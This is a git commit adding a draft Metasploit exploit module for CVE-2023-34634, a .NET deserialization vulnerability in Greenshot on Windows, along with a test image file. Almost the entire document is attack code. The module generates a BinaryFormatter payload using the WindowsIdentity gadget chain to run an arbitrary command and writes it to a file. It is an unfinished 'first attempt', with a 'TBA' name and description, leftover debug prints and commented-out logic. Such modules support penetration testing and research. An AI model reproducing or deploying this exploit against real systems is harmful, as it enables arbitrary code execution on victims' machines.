First attempt at CVE-2023-34634

2024-07-18 18:31:41 +02:00 · 2023-08-03 10:58:07 -05:00 · 2023-08-03 10:58:07 -05:00 · 59e3760509
commit 59e3760509
parent cd8cd0a52b
2 changed files with 82 additions and 0 deletions
--- a/data/exploits/cve-2023-34634/test.png
+++ b/data/exploits/cve-2023-34634/test.png
--- a/modules/exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634.rb
+++ b/modules/exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634.rb
@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TBA',
+        'Description' => %q{
+          TBA
+        },
+        'DisclosureDate' => '2023-07-26',
+        'Author' => [
+          'p4r4bellum',  # Discovery
+          'bwatters-r7', # msf exploit
+        ],
+        'References' => [
+          ['CVE', '2023-34634'],
+          ['EDB', '51633']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_command,
+              'Space' => 3000
+            }
+          ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptPath.new('PNG_FILE', [false, 'PNG file to use', 'xyz'])
+    ])
+  end
+
+  def exploit
+    vprint_status('Hello')
+    if datastore['PNG_FILE'].blank?
+      File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')
+    else
+      datastore['PNG_FILE']
+    end
+
+    cmd = payload.encoded
+    # cmd = 'calc'
+
+    # image_data = File.binread(image_file)
+
+    deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(
+      cmd,
+      gadget_chain: :WindowsIdentity,
+      formatter: :BinaryFormatter
+    )
+    file_create(deserialize_cmd)
+    # vprint_status('Hello1')
+    # exploit_data = image_data + deserialize_cmd
+    # vprint_status('Hello2')
+    # exploit_data << [exploit_data.length].pack('Q')
+    # vprint_status('Hello3')
+    # exploit_data << "Greenshot01.02"
+    # vprint_status('Hello4')
+    # file_create(exploit_data)
+  end
+end